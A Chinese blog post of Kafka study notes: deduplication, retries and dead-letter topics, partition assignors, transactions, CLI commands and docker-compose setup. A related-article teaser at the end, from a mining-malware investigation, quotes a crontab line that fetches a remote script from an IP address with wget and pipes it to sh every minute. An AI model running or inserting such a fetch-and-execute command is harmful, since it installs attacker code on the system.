kafka學習筆記 @by_TWJ

目錄

  • 1. 消息重復消費怎么解決
    • 1.1. 確保相同的消息不會被重復發送(消費冪等性)
    • 1.2. 消息去重
    • 1.3. 消息重試機制
    • 1.4. kafka怎么保證消息的順序性
      • 1.4.1. 利用分區的特征:
      • 1.4.2. 解決辦法:
      • 1.4.3. 分區分配策略
        • 1.4.3.1. RangeAssignor (每組(Topic)里的分區(partition)都依次消費,可能導致第一個消費者負重,最后的消費者無消息可消費)
        • 1.4.3.2. RoundRobinAssignor (所有分區(partition)依次消費,不在區分有沒有組(Topic)。所有資源都盡量就盡量均衡。)
        • 1.4.3.3. StickyAssignor (不改變原來的分配上,把關聯消費者宕機的分區,重新分配給其他消費者,盡量達到均衡)
    • 1.5. kafka 怎么知道消費成功
    • 1.6. 死信(消息處理失敗后怎么處理)
      • 1.6.1. 死信配置(這里存放到特定的主題)
    • 1.7. 事務
      • 1.7.1. 配置參數開啟事務:
      • 1.7.2. Producer 事務
        • 1.7.2.1. javaSDK例子
        • 1.7.2.2. springboot例子
      • 1.7.3. Consumer 事務
        • 1.7.3.1. 隔離級別:
        • 1.7.3.2. 提交事務和回滾事務
        • 1.7.3.3. 總結:
  • 2. kafka文檔
    • 2.1. Topic、Group、Partition、消費者的關系
    • 2.2. 管理topic
    • 2.3. 發送producer消息
    • 2.4. consumer - 消費producer消息
    • 2.5. 部署kafka
    • 2.6. 部署zookeeper
    • 2.7. 學習用的demo

1. 消息重復消費怎么解決

消息重復消費的問題可以通過多種方法解決,主要包括消費冪等性、消息去重、消息確認機制、消息重試機制、保證消息的順序性以及將消息進行持久化存儲。

  • 消費冪等性:確保在同一條消息被重復消費時,系統不會產生副作用或影響系統的正確性。這可以通過在消費端使用唯一標識來判斷消息是否已經被消費過,例如使用數據庫的唯一索引、使用分布式鎖等方式來保證冪等性。

  • 消息去重:針對同一條消息的多次消費,只保留其中一次消費結果。可以在消費者端進行去重,使用緩存或數據庫來記錄已經處理過的消息,避免重復消費。

  • 消息確認機制:MQ一般提供消息確認機制,如ACK機制。消費者在成功處理一條消息后,發送ACK給MQ,表示該消息已經被成功消費。如果消費者在處理消息時發生異常或失敗,可以不發送ACK,MQ會將該消息重新發送給其他消費者進行處理。

  • 消息重試機制:當消息處理失敗時,可以將消息重新發送給MQ,由MQ重新投遞給消費者進行處理。可以在消息的header中添加重試次數的標記,當達到最大重試次數后,可以將消息發送到死信隊列進行處理,以避免消息的無限重試。

  • 保證消息的順序性:如果消息的順序性很重要,可以將相關消息發送到同一個分區或同一個隊列中,以保證消息的順序性。(kafka分區)

  • 持久化機制:為了避免消息丟失,可以將消息進行持久化存儲,例如將消息存儲到數據庫或文件系統中。即使MQ發生故障或重啟,也可以通過持久化的消息進行恢復。

這些方法可以單獨或結合使用,以有效解決消息重復消費的問題,確保系統的穩定性和數據的準確性。

1.1. 確保相同的消息不會被重復發送(消費冪等性)

Kafka事務是怎么實現的?Kafka事務消息原理詳解
Kafka生產者可以配置為冪等,確保相同的消息不會被重復發送。
保證在消息重發的時候,消費者不會重復處理。即使在消費者收到重復消息的時候,重復處理,也要保證最終結果的一致性。(可以理解為在應用端做了冪等處理。即使重復消息發送過來了,也會判斷是否已在處理,從而達到一條消息只會被一個處理)

消息在 MQ 中的傳遞,大致可以歸類為下面三種:

  • At most once: 至多一次。消息在傳遞時,最多會被送達一次。是不安全的,可能會丟數據。

  • At least once: 至少一次。消息在傳遞時,至少會被送達一次。也就是說,不允許丟消息,但是允許有少量重復消息出現。

  • Exactly once:恰好一次。消息在傳遞時,只會被送達一次,不允許丟失也不允許重復,這個是最高的等級。

大部分消息隊列滿足的都是At least once,也就是可以允許重復的消息出現。

1.2. 消息去重

針對同一條消息的多次消費,只保留其中一次消費結果。可以在消費者端進行去重,使用緩存或數據庫來記錄已經處理過的消息,避免重復消費。
例如,使用redis緩存去重:

 // 去重public void removeRepeatProcessMessage(FsConsumer fsConsumer){RSet<String> set = redisson.getSet("local:fs:downloadFileMsg");if (set.add(fsConsumer.getMsgId())) {// 成功則處理,失敗則拋出異常,記錄到死信隊列里// 只有當消息ID被成功添加到集合時才處理消息processMessage(fsConsumer);} else {// 去重處理// 如果消息ID已存在于集合中,則表示該消息已處理,跳過System.out.println("Message with ID " + fsConsumer.getMsgId() + " has already been processed.");}}

1.3. 消息重試機制

當消息處理失敗時,可以將消息重新發送給MQ,由MQ重新投遞給消費者進行處理。可以在消息的header中添加重試次數的標記,當達到最大重試次數后,可以將消息發送到死信隊列進行處理,以避免消息的無限重試。

@Configuration
public class KafkaConfig {@Beanpublic ConcurrentKafkaListenerContainerFactory<?, ?> kafkaListenerContainerFactory(ConcurrentKafkaListenerContainerFactoryConfigurer configurer,ConsumerFactory<Object, Object> kafkaConsumerFactory,KafkaTemplate<Object, Object> template) {ConcurrentKafkaListenerContainerFactory<Object, Object> factory = new ConcurrentKafkaListenerContainerFactory<>();configurer.configure(factory, kafkaConsumerFactory);//最大重試三次ConsumerRecordRecoverer recoverer = new DeadLetterPublishingRecoverer(template);
//        設置重試間隔 10秒, 重試次數為 1 次BackOff backOff = new FixedBackOff(10 * 1000L, 3L);// 失敗進入死信,topic和group,都變成${topic}.DLT和${group}.DLT ,如下是進入死信的例子:/*# bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup.DLT && bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroupGROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-IDmyGroup.DLT     myTopic.DLT     0          4               4               4               test-0-faf8afcc-e4b1-4aca-b064-356163564495 /192.168.3.3    test-0GROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-IDmyGroup         myTopic         0          800020          800020          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0myGroup         myTopic         1          400012          400012          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0myGroup         myTopic         2          300000          300000          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0*/factory.setCommonErrorHandler(new DefaultErrorHandler(recoverer,backOff));return factory;}
}

1.4. kafka怎么保證消息的順序性

1.4.1. 利用分區的特征:

  1. 分區是最小的并列單位;
  2. 一個消費者可以消費多個分區;
  3. 一個分區可以被多個消費者組里的消費者消費;
  4. 但是,一個分區不能同時被同一個消費者組里的多個消費者消費;(意思是:在組里,一個分區同時消費的只能有一個消費者)

1.4.2. 解決辦法:

  1. 把全部有序消息放到同一個分區里
  2. 把有需要有序的消息,放到同一個分區里。

1.4.3. 分區分配策略

Kafka的消費者分區策略
一個consumer group中有多個consumer,一個topic有多個partition,所以必然會涉及到partition的分配問題,即確定哪個partition由哪個consumer來消費。Kafka提供了3種消費者分區分配策略:RangeAssigorRoundRobinAssignorStickyAssignor

術語:
partition - 分區

1.4.3.1. RangeAssignor (每組(Topic)里的分區(partition)都依次消費,可能導致第一個消費者負重,最后的消費者無消息可消費)

RangeAssignor對每個Topic進行獨立的分區分配。對于每一個Topic,首先對分區按照分區ID進行排序,然后訂閱這個Topic的消費組的消費者再進行排序,之后盡量均衡的將分區分配給消費者。這里只能是盡量均衡,因為分區數可能無法被消費者數量整除,那么有一些消費者就會多分配到一些分區。分配示意圖如下:

在這里插入圖片描述

T0 是Topic-0
T1 是Topic-1
在這里插入圖片描述

1.4.3.2. RoundRobinAssignor (所有分區(partition)依次消費,不在區分有沒有組(Topic)。所有資源都盡量就盡量均衡。)

RoundRobinAssignor的分配策略是將消費組內訂閱的所有Topic的分區及所有消費者進行排序后盡量均衡的分配(RangeAssignor是針對單個Topic的分區進行排序分配的)。如果消費組內,消費者訂閱的Topic列表是相同的(每個消費者都訂閱了相同的Topic),那么分配結果是盡量均衡的(消費者之間分配到的分區數的差值不會超過1)。如果訂閱的Topic列表是不同的,那么分配結果是不保證“盡量均衡”的,因為某些消費者不參與一些Topic的分配。
在這里插入圖片描述

1.4.3.3. StickyAssignor (不改變原來的分配上,把關聯消費者宕機的分區,重新分配給其他消費者,盡量達到均衡)

StickyAssignor分區分配算法,目的是在執行一次新的分配時,能在上一次分配的結果的基礎上,盡量少的調整分區分配的變動,節省因分區分配變化帶來的開銷。Sticky是“粘性的”,可以理解為分配結果是帶“粘性的”——每一次分配變更相對上一次分配做最少的變動。其目標有兩點:

分區的分配盡量的均衡。
每一次重分配的結果盡量與上一次分配結果保持一致。
當這兩個目標發生沖突時,優先保證第一個目標。第一個目標是每個分配算法都盡量嘗試去完成的,而第二個目標才真正體現出StickyAssignor特性的。

StickyAssignor算法比較復雜,下面舉例來說明分配的效果(對比RoundRobinAssignor),前提條件:

有4個Topic:T0、T1、T2、T3,每個Topic有2個分區。
有3個Consumer:C0、C1、C2,所有Consumer都訂閱了這4個分區。
在這里插入圖片描述

1.5. kafka 怎么知道消費成功

Kafka 不直接提供一種機制來確認消費者是否成功消費了消息。但是,它提供了幾種策略來保證消息的成功處理:

  • 使用 Kafka 的自動提交功能:可以配置消費者自動定期提交消息的偏移量。

  • 手動提交偏移量:消費者可以在處理完消息后手動提交偏移量,表明該消息已被成功處理。

  • 使用 Kafka 事務:在支持事務的 Kafka 集群上,可以開啟事務來保證消費者處理消息的全部成功或失敗。

以下是一個簡單的示例,展示如何在消費者中手動提交偏移量:

import org.apache.kafka.clients.consumer.ConsumerRecords;
import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.clients.consumer.ConsumerConfig;import java.util.Arrays;
import java.util.Properties;public class ManualOffsetCommit {public static void main(String[] args) {Properties props = new Properties();props.put(ConsumerConfig.BOOTSTRAP_SERVERS_CONFIG, "localhost:9092");props.put(ConsumerConfig.GROUP_ID_CONFIG, "test");props.put(ConsumerConfig.ENABLE_AUTO_COMMIT_CONFIG, "false"); // 關閉自動提交props.put(ConsumerConfig.KEY_DESERIALIZER_CLASS_CONFIG, "org.apache.kafka.common.serialization.StringDeserializer");props.put(ConsumerConfig.VALUE_DESERIALIZER_CLASS_CONFIG, "org.apache.kafka.common.serialization.StringDeserializer");KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);consumer.subscribe(Arrays.asList("topic"));while (true) {ConsumerRecords<String, String> records = consumer.poll(100);for (ConsumerRecord<String, String> record : records) {// 處理消息System.out.println(record.value());// 處理完后提交當前偏移量consumer.commitSync();}}}
}

1.6. 死信(消息處理失敗后怎么處理)

死信,即Dead Letter,是指在Kafka中無法消費的消息。當消息因為以下原因而無法被消費時,可能會變成死信:

  • 消費者故障,無法處理消息。
  • 消息處理時發生異常。
  • 消息達到設定的消息Level再次嘗試消費的次數限制。

為了處理死信,Kafka提供了幾種策略:

  • 將死信發送到一個特定的主題(Topic)。
  • 將死信保存到一個文件中。

以下是一個示例,演示如何設置Kafka消費者,以便將死信消息發送到一個特定的主題:

1.6.1. 死信配置(這里存放到特定的主題)

    @BeanDefaultErrorHandler errorHandler(KafkaTemplate<Object, Object> template) {// 失敗進入死信,topic和group,都變成${topic}.DLT和${group}.DLT ,如下是進入死信的例子:/*# bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup.DLT && bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroupGROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-IDmyGroup.DLT     myTopic.DLT     0          4               4               0               test-0-faf8afcc-e4b1-4aca-b064-356163564495 /192.168.3.3    test-0GROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-IDmyGroup         myTopic         0          800020          800020          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0myGroup         myTopic         1          400012          400012          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0myGroup         myTopic         2          300000          300000          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0*/
//        DeadLetterPublishingRecoverer recoverer = new DeadLetterPublishingRecoverer(template,
//                (r, e) -> {
//                       //死信的結果發送到特定的主題
//                    return new TopicPartition(r.topic()+".DLT", r.partition());
//
//                });DeadLetterPublishingRecoverer recoverer = new DeadLetterPublishingRecoverer(template);
//        ErrorHandler errorHandler = new FallbackBatchErrorHandler(recoverer, new FixedBackOff(0L, 2L));return new DefaultErrorHandler(recoverer,new FixedBackOff(10*1000L, 2L));}@BeanKafkaListenerContainerFactory<ConcurrentMessageListenerContainer<String, String>>kafkaListenerContainerFactory(DefaultErrorHandler defaultErrorHandler) {ConcurrentKafkaListenerContainerFactory<String, String>factory = new ConcurrentKafkaListenerContainerFactory<>();// 設置消費者工廠factory.setConsumerFactory(consumerFactory());// 消費者組中線程數量factory.setConcurrency(3);// 拉取超時時間factory.getContainerProperties().setPollTimeout(3000);// 當使用批量監聽器時需要設置為truefactory.setBatchListener(true);factory.setCommonErrorHandler(defaultErrorHandler);return factory;}

觸發死信的業務代碼

 @Service
public class UserConsumerService {@KafkaListener(topics = {"myUser"},groupId = "myUserGroup", containerFactory="kafkaListenerContainerFactory")
//    public void kafkaListener(String message){public void kafkaListener(List<ConsumerRecord<String, String>> recordList){System.out.println("消費列表:"+recordList.size());for (ConsumerRecord<String, String> consumerRecord : recordList) {kafkaListener(consumerRecord);}}public void kafkaListener(ConsumerRecord<String, String> record){String key = record.key().toString();String value = record.value().toString();System.out.println(record.offset()+" \t "+key+" \t "+ value);if(value.contains("abc")){System.out.println("存在消費abc");throw new RuntimeException("存在消費abc");}}}

1.7. 事務

1.7.1. 配置參數開啟事務:

// transactional.id = transactionId
props.put(ProducerConfig.TRANSACTIONAL_ID_CONFIG,"transactionId");

1.7.2. Producer 事務

保證事務原子性操作

事務期間,會發送produce消息到kafka服務器上的Topic,這是未提交狀態的消息,你可以看到Topic上多了幾條消息。
事務回滾后,消息還是會存在的。所以comsumer需要使用讀已提交的方式獲取。

1.7.2.1. javaSDK例子

以下是 Producer 事務使用示例:

Properties props = new Properties();
props.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");
props.put("client.id", "ProducerTranscationnalExample");
props.put("bootstrap.servers", "localhost:9092");
props.put("transactional.id", "test-transactional");
props.put("acks", "all");KafkaProducer producer = new KafkaProducer(props);producer.initTransactions();try {String msg = "matt test";producer.beginTransaction();producer.send(new ProducerRecord(topic, "0", msg.toString()));producer.send(new ProducerRecord(topic, "1", msg.toString()));producer.send(new ProducerRecord(topic, "2", msg.toString()));producer.commitTransaction();} catch (ProducerFencedException e1) {e1.printStackTrace();producer.close();
} catch (KafkaException e2) {e2.printStackTrace();producer.abortTransaction();
}
producer.close();
1.7.2.2. springboot例子
@Transactional
public String sendForTransaction(String userNo, String jsonString) {System.out.println("sendForTransaction方法中,是否開啟事務中:"+kafkaTemplate.inTransaction());kafkaTemplate.send("myUser","key",jsonString);return "success";
}

1.7.3. Consumer 事務

通過使用隔離級別能查看到未提交的消息。

1.7.3.1. 隔離級別:

隔離級別:

  • isolation.level=read_uncommitted 讀未提交
  • isolation.level=read_committed 讀取已提交

配置方式:

propsMap.put(ConsumerConfig.ISOLATION_LEVEL_CONFIG, IsolationLevel.READ_COMMITTED.toString().toLowerCase(Locale.ROOT));//# 讀取已提交的消息
propsMap.put(ConsumerConfig.ISOLATION_LEVEL_CONFIG, IsolationLevel.READ_UNCOMMITTED.toString().toLowerCase(Locale.ROOT));//# 讀取已提交的消息

Springboot中kafka默認隔離級別是 讀未提交

public class ConsumerConfig{....public static final String DEFAULT_ISOLATION_LEVEL = IsolationLevel.READ_UNCOMMITTED.toString().toLowerCase(Locale.ROOT);....
}    
1.7.3.2. 提交事務和回滾事務

使用 Kafka 事務:在支持事務的 Kafka 集群上,可以開啟事務來保證消費者處理消息的全部成功或失敗。

// 自動提交事務@Transactionalpublic String sendForTransaction1(String userNo, String jsonString) {System.out.println("sendForTransaction方法中,是否開啟事務中:"+kafkaTemplate.inTransaction());kafkaTemplate.send("myUser","key",jsonString);return "success";}
// 回滾事務@Transactionalpublic String sendForTransaction(String userNo, String jsonString) {System.out.println("sendForTransaction方法中,是否開啟事務中:"+kafkaTemplate.inTransaction());kafkaTemplate.send("myUser","key",jsonString);throw new RuntimeException();}
1.7.3.3. 總結:

初步:因為分區只會被一個消費者消費,沒消費完就不會發送下個消息,所以發送到消費者端,實際上就同時進行事務的就只有一個,相當于同步消費。

進階:但這樣性能會很差,所以后面可以把業務操作區間的,進行隔離歸類,就像id余數為1的放1分區,id余數為2的放2分區,這樣大大提高了消費速度,可自定義程度高,受制于本人設計,它的瓶頸就是設計人員,如果歸類好,可以不存在資源搶占問題。

瓶頸:但消息有個問題,就是一個分區每次只能消費一條記錄,所以它并行處理嚴重依賴于分區數量,但分區數量也不是亂加的,設計不合理,會存在資源操作沖突的問題。

對比其他事務的瓶頸:

  • 消息事務:瓶頸在于設計人員設計,合理分配分區數量,資源搶占問題在設計層面就已經解決了。
  • seata:瓶頸在于是否存在資源搶占。
    • seata的XA、AT、TCC等 的瓶頸在于是否存在資源搶占,如果在修改倉庫那功能的話,因為存在資源搶占的話,相當于同步處理,其他線程被鎖,只有一個線程在處理,這么多服務都只會有一個業務在處理,直接導致seta性能拖慢。

個人建議:

  • 如果業務存在資源搶占的話,使用消息事務會更優。
  • 如果業務不存在資源搶占的話,使用seta會更優。

消息事務就像是基金一樣,穩定處理,
seata就像是股票一樣,上下波動,一時快,一時慢。(若使用在合適場景會很快。)

應用場景:如果不停的區分seata和消息事務會很累的,而且因為費用問題,還有業務一定會有資源搶占問題,所以一般都使用消息事務的方式處理。這是我個人分析。

2. kafka文檔

https://kafka.apache.org/documentation/#producerconfigs

2.1. Topic、Group、Partition、消費者的關系

大體上分為Topic和Group,代表的是發布者與訂閱者。

Topic 就像是一個數據庫表,Partition就是數據庫表中的分表存儲的記錄。
Group指的是消費者組,消費者組里有很多個消費者,消費Topic的Partition表里的消息

例如:

TopicsmyOrdermyOrder.DLTmyTopicmyTopic.DLTmyUsermyUser.DLT
Consumer GroupsmyGroupmyGroup.DLTmyUserGroupmyUserGroup.DLT

Topic的消息只記錄數據,不記錄消費記錄
Group只記錄消息消費情況。

Topic 與 消費組 的關系,就像是聊天室,topic是發布消息A,其他消費組都能收到消息A,消息是一對多的關系,每次增加一組消費者,都會從0offset開始讀取Topic

2.2. 管理topic

https://blog.51cto.com/u_16213637/9850264

# 查看所有topicbin/kafka-topics.sh --bootstrap-server localhost:9092  --list
--------------------
__consumer_offsets
myTopic
test-javasdk
--------------------
# 查看topic詳情
> bin/kafka-topics.sh --describe --topic myTopic --bootstrap-server localhost:9092
--------------------
Topic: myTopic	TopicId: Y_t8v2snRgmirrGykcLYmg	PartitionCount: 3	ReplicationFactor: 1	Configs: segment.bytes=1073741824Topic: myTopic	Partition: 0	Leader: 1001	Replicas: 1001	Isr: 1001Topic: myTopic	Partition: 1	Leader: 1001	Replicas: 1001	Isr: 1001Topic: myTopic	Partition: 2	Leader: 1001	Replicas: 1001	Isr: 1001--------------------
# 創建topic
> bin/kafka-topics.sh --bootstrap-server localhost:9092 --create --topic my_topic_name \--partitions 20 --replication-factor 1 --config x=y
簡寫:> bin/kafka-topics.sh --create --topic quickstart-events --bootstrap-server localhost:9092        # 修改topic
> bin/kafka-topics.sh --bootstrap-server localhost:9092 -alter --partitions 3 --topic myTopic
//> bin/kafka-configs.sh --bootstrap-server localhost:9092 --entity-type topics --entity-name myTopic --partitions 20 --alter # 修改topic 的分區
bin/kafka-topics.sh --bootstrap-server localhost:9092 -alter --partitions 3 --topic myTopic# 刪除topic> bin/kafka-topics.sh --bootstrap-server broker_host:port --delete --topic my_topic_name# 添加topic配置,例如修改  partitions 40      
> bin/kafka-topics.sh --bootstrap-server broker_host:port --alter --topic my_topic_name \--partitions 40# 刪除topic配置
> bin/kafka-configs.sh --bootstrap-server broker_host:port --entity-type topics --entity-name my_topic_name --alter --add-config x=y# 消費者列表
> bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic myTopic --from-beginning
--------------------
test-99988
test-99989
test-99990
test-99991
test-99992
test-99993
test-99994
test-99995
--------------------
# 查看消費組里的成員
> bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup  --members
--------------------
GROUP           CONSUMER-ID                                        HOST            CLIENT-ID       #PARTITIONS     
myGroup         ConsumerTest-1a87e781-b3ce-43c8-ac4a-76c8ccdec5aa  /192.168.3.3    ConsumerTest    2               
myGroup         ConsumerTest2-ed1ddf24-7a68-4136-ad39-d774f531d765 /192.168.3.3    ConsumerTest2   1  
--------------------# 查看消息堆積情況(還可以看出是哪臺機器有)
bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup
--------------------GROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                        HOST            CLIENT-ID
myGroup         myTopic         0          664075          700001          35926           ConsumerTest-3f121c59-ca11-4fa8-8fa0-538e0f0d5bdb  /192.168.3.3    ConsumerTest
myGroup         myTopic         1          284334          300000          15666           ConsumerTest-3f121c59-ca11-4fa8-8fa0-538e0f0d5bdb  /192.168.3.3    ConsumerTest
myGroup         myTopic         2          200000          200000          0               ConsumerTest2-4ae32ff0-e67f-4d09-8185-005bf61f3b1f /192.168.3.3    ConsumerTest2其中:LAG 是待消費記錄
--------------------
  • replication-factor

復制因素控制有多少服務器將復制寫入的每條消息。如果您的復制因子為3,那么在您失去對數據的訪問權限之前,最多可以有2臺服務器出現故障。我們建議您使用2或3的復制因子,這樣您就可以在不中斷數據消耗的情況下透明地跳轉機器。

  • partitions

分區計數控制主題將被切分成多少個日志。分區計數有幾個影響。首先,每個分區必須完全適合單個服務器。因此,如果您有20個分區,那么整個數據集(以及讀寫負載)將由不超過20臺服務器處理(不包括副本)。最后,分區計數會影響消費者的最大并行性。這將在概念部分進行更詳細的討論。

每個分片的分區日志都放在Kafka日志目錄下自己的文件夾中。這類文件夾的名稱由主題名稱、加上破折號(-)和分區id組成。由于典型的文件夾名稱長度不能超過255個字符,因此主題名稱的長度將受到限制。我們假設分區的數量永遠不會超過100,000。因此,主題名稱不能超過249個字符。這在文件夾名稱中留下了足夠的空間來放置破折號和可能的5位數長的分區id。

  • config

與主題相關的配置既有服務器默認值,也有可選的每個主題覆蓋。如果沒有給出每個主題的配置,則使用服務器默認值。可以在創建主題時通過提供一個或多個——config選項來設置覆蓋。下面的例子創建了一個名為my-topic的主題,并自定義了最大消息大小和刷新速率:

> bin/kafka-topics.sh --bootstrap-server localhost:9092 --create --topic my-topic --partitions 1 \--replication-factor 1 --config max.message.bytes=64000 --config flush.messages=1

以后還可以使用alter configs命令更改或設置覆蓋。下面的例子更新了my-topic的最大消息大小:

> bin/kafka-configs.sh --bootstrap-server localhost:9092 --entity-type topics --entity-name my-topic--alter --add-config max.message.bytes=128000

要檢查主題上設置的覆蓋,您可以執行以下操作

> bin/kafka-configs.sh --bootstrap-server localhost:9092 --entity-type topics --entity-name my-topic --describe

要移除覆蓋,您可以這樣做

> bin/kafka-configs.sh --bootstrap-server localhost:9092  --entity-type topics --entity-name my-topic--alter --delete-config max.message.bytes

以下是主題級配置。服務器對此屬性的默認配置在服務器默認屬性標題下給出。給定的服務器默認配置值僅適用于沒有顯式主題配置覆蓋的主題。

2.3. 發送producer消息

# 發送消息
> bin/kafka-console-producer.sh --topic quickstart-events --bootstrap-server localhost:9092
This is my first event
This is my second eventCtrl-C 終止

2.4. consumer - 消費producer消息

# 消費消息
$ bin/kafka-console-consumer.sh --topic quickstart-events --from-beginning --bootstrap-server localhost:9092
This is my first event
This is my second event

數量統計:普通消息和死信消息
死信是應用端生成的,非kafka本身自帶。
myGroup.DLT 是死信
myGroup 是普通消息

bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup.DLT && bin/kafka-consumer-groups.sh --bootstrap-server localhost:9092 --describe --group myGroup
---------------------------------
GROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-ID
myGroup.DLT     myTopic.DLT     0          4               4               0               test-0-faf8afcc-e4b1-4aca-b064-356163564495 /192.168.3.3    test-0GROUP           TOPIC           PARTITION  CURRENT-OFFSET  LOG-END-OFFSET  LAG             CONSUMER-ID                                 HOST            CLIENT-ID
myGroup         myTopic         0          800020          800020          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0
myGroup         myTopic         1          400012          400012          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0
myGroup         myTopic         2          300000          300000          0               test-0-968dad79-aebe-4c36-827c-fc8479f988ca /192.168.3.3    test-0---------------------------------

2.5. 部署kafka

創建docker-compose.yml

version: '2'
services:zookeeper:image: wurstmeister/zookeeperports:- "2181:2181"kafka:image: wurstmeister/kafkaports:- "9092:9092"environment:KAFKA_ADVERTISED_HOST_NAME: localhostKAFKA_ZOOKEEPER_CONNECT: zookeeper:2181volumes:- /var/run/docker.sock:/var/run/docker.sock
# 證實可以
docker-compose up -d

2.6. 部署zookeeper

后面在找了一個
創建docker-compose.yml


version: '2'
services:zookeeper: # 注意,在我的archlinux系統的機子會有內存泄露問題image: wurstmeister/zookeeperports:- "2181:2181"2.6.   kafka:image: wurstmeister/kafkaports:- "9092:9092"environment:KAFKA_ADVERTISED_HOST_NAME: localhostKAFKA_ZOOKEEPER_CONNECT: zookeeper:2181volumes:- /var/run/docker.sock:/var/run/docker.sock
# 啟動
docker-compose up -d

2.7. 學習用的demo

https://gitee.com/alvis128/springboot-kafka-demo

官網:https://docs.spring.io/spring-kafka/docs/2.7.8/reference/html/#using-kafkatransactionmanager

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/23281.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/23281.shtml
英文地址,請注明出處:http://en.pswp.cn/web/23281.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

一次挖礦病毒的排查過程

目錄 一、查看定時任務二、處理方法 一、查看定時任務 # crontab -l * * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1 0 */1 * * * /usr/local/nginx/sbin/nginx -s reload發現異常任務&#xff1a; * * * * * wget -q -O - http://1…

用python寫一個集卡模擬器

超市最近在籌備一款水滸主題的卡牌類游戲&#xff0c;將綠林好漢設計成游戲中的一百零八張卡牌&#xff0c;卡牌共有 SSR、SR、R 三種稀有度。 你能編寫程序&#xff0c;讓玩家有 1% 的幾率抽中 SSR 卡、9% 幾率抽中 SR 卡、90% 幾率抽中 R 卡嗎&#xff1f; 數據說明 卡牌數…

【PLG洞察】| 飛書成功之路:關鍵在分銷裂變

引言 隨著企業服務市場的發展&#xff0c;Product-Led Growth&#xff08;PLG&#xff0c;產品驅動增長&#xff09;模式逐漸成為眾多SaaS企業的首選戰略。在這個背景下&#xff0c;字節跳動旗下的企業協作與管理平臺——飛書&#xff0c;憑借其獨特的分銷裂變策略&#xff0c…

【YOLOV8】2.目標檢測-訓練自己的數據集

Yolo8出來一段時間了,包含了目標檢測、實例分割、人體姿態預測、旋轉目標檢測、圖像分類等功能,所以想花點時間總結記錄一下這幾個功能的使用方法和自定義數據集需要注意的一些問題,本篇是第二篇,目標檢測功能,自定義數據集的訓練。 YOLO(You Only Look Once)是一種流行的…

【原創】springboot+mysql村務檔案管理系統設計與實現

個人主頁&#xff1a;程序猿小小楊 個人簡介&#xff1a;從事開發多年&#xff0c;Java、Php、Python、前端開發均有涉獵 博客內容&#xff1a;Java項目實戰、項目演示、技術分享 文末有作者名片&#xff0c;希望和大家一起共同進步&#xff0c;你只管努力&#xff0c;剩下的交…

快速搭建sentence_transformer方法

sentence transformer模型可以將句子進行Embedding。這里使用docker快速構建一個sentence transformer環境&#xff0c;小試牛刀。 準備鏡像 這里Docker的安裝就不介紹了&#xff0c;我們使用Dockerfile來構建我們的鏡像&#xff0c;Dockerfile內容如下&#xff1a; FROM py…

pytorch——貓狗識別

貓狗識別 訓練模型導入需要的包數據加載數據預處理加載數據集并返回對應的圖像和標簽提取標簽信息創建訓練和測試的數據加載器圖像分類CNN的卷積神經網絡模型MYVGG的卷積神經網絡模型AlexNet的卷積神經網絡模型 訓練過程測試過程定義了一個主函數 測試模型導入需要的庫加載之前…

無線模塊應用晶振SG5032VAN

隨著物聯網&#xff08;IoT&#xff09;和無線通信技術的迅速發展&#xff0c;無線模塊已經成為各種智能設備的重要組成部分。在無線模塊中&#xff0c;選擇高性能的時鐘源對于確保系統的穩定性和可靠性至關重要。愛普生SG5032VAN是一款LVDS差分晶振&#xff0c;作為一款高性能…

WINUI——Behavior(行為)小結

前言 在使用MVVM進行WINUI或WPF開發時&#xff0c;Command在某些時候并不能滿足邏輯與UI分離的要求。這時肯定就需要其它技術的支持&#xff0c;Behavior就是一種。在WPF中是有Behavior直接支持的&#xff0c;轉到WINUI后&#xff0c;相對有一些麻煩&#xff0c;于是在此記錄之…

Enscape 4.1.0 軟件安裝教程+離線資源庫

